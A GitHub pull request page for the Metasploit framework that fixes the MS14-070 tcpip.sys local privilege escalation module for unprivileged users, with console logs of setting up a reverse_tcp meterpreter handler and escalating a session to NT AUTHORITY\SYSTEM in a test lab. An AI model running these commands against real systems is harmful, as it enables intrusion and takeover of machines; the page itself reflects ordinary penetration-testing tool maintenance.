Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fixed open device issue for non-priv users #4791

Merged
merged 1 commit into from Feb 18, 2015
Merged

Fixed open device issue for non-priv users #4791

merged 1 commit into from Feb 18, 2015
+2 −2

Conversation

KoreLogicSecurity
Copy link
Contributor

Fixed the open_device call to work for users without Administrator
privileges

Example run:

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp                                                                     
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.0.2.2                                                                                              
LHOST => 10.0.2.2
msf exploit(handler) > set LPORT 4445                                                                                                  
LPORT => 4445
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     10.0.2.2         yes       The listen address
   LPORT     4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set ExitOnSession false                                                                                         
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[-] Handler failed to bind to 10.0.2.2:4445
[*] Started reverse handler on 0.0.0.0:4445
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (770048 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4445 -> 127.0.0.1:54433) at 2015-02-18 12:41:59 -0500

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                   Connection
  --  ----                   -----------                   ----------
  1   meterpreter x86/win32  WIN2K3TEST\kore @ WIN2K3TEST  127.0.0.1:4445 -> 127.0.0.1:54433 (127.0.0.1)

msf exploit(handler) > use exploit/windows/local/ms14_070_tcpip_ioctl
msf exploit(ms14_070_tcpip_ioctl) > set SESSION 1
SESSION => 1
msf exploit(ms14_070_tcpip_ioctl) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 0.0.0.:4444
msf exploit(ms14_070_tcpip_ioctl) > [*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (770048 bytes) to 127.0.0.1
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:36587) at 2015-02-18 12:43:02 -0500                                      
msf exploit(ms14_070_tcpip_ioctl) > sessions -l

Active sessions
===============

  Id  Type                   Information                       Connection
  --  ----                   -----------                       ----------
  1   meterpreter x86/win32  WIN2K3TEST\kore @ WIN2K3TEST      127.0.0.1:4445 -> 127.0.0.1:54433 (127.0.0.1)
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN2K3TEST  127.0.0.1:4444 -> 127.0.0.1:36587 (127.0.0.1)

msf exploit(ms14_070_tcpip_ioctl) >

Fixed open device issue for non-priv users
e40772e 
Fixed the open_device call to work for users without Administrator
privileges
@zeroSteiner zeroSteiner self-assigned this Feb 18, 2015
@zeroSteiner
Copy link
Contributor

The open_device arguments make more sense now (desired_access 0 and share_mode of 'FILE_SHARE_READ'). The module's exploit and check method are both working as a user with less privileges than before.

msf-git (S:1 J:1) exploit(ms14_070_tcpip_ioctl) > check

[-] [2015.02.18-17:10:05] Failed to open the \\.\tcp device (error: 5 Access is denied.)
[*] 192.168.90.142 - The target is not exploitable.
msf-git (S:1 J:1) exploit(ms14_070_tcpip_ioctl) > reload
[*] Reloading module...
msf-git (S:1 J:1) exploit(ms14_070_tcpip_ioctl) > check

[*] [2015.02.18-17:10:54] tcpip.sys file version: 5.2.3790.4573 branch: 45
[+] 192.168.90.142 - The target is vulnerable.
msf-git (S:1 J:1) exploit(ms14_070_tcpip_ioctl) > exploit

[*] [2015.02.18-17:10:59] Started reverse handler on 172.20.220.153:4444 
[*] [2015.02.18-17:11:01] tcpip.sys file version: 5.2.3790.4573 branch: 45
[*] [2015.02.18-17:11:01] Storing the shellcode in memory...
[*] [2015.02.18-17:11:02] Triggering the vulnerability...
[*] [2015.02.18-17:11:02] Checking privileges after exploitation...
[+] [2015.02.18-17:11:03] Exploitation successful!
[*] [2015.02.18-17:11:03] Creating the thread to execute in 0x16a0000 (pid=3564)
[*] [2015.02.18-17:11:03] Sending stage (770048 bytes) to 172.20.220.153
[*] Meterpreter session 3 opened (172.20.220.153:4444 -> 172.20.220.153:56301) at 2015-02-18 17:11:05 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Will land this in just a minute.

@zeroSteiner zeroSteiner merged commit e40772e into rapid7:master Feb 18, 2015
zeroSteiner added a commit that referenced this pull request Feb 18, 2015
@zeroSteiner
Land #4791, fix ms14-070 CreateFile arguments
fe84063 
The arguments to CreateFileA used to require that the user had
some level of access on the \\.\tcp device.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@zeroSteiner zeroSteiner

Labels
bug module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@KoreLogicSecurity @zeroSteiner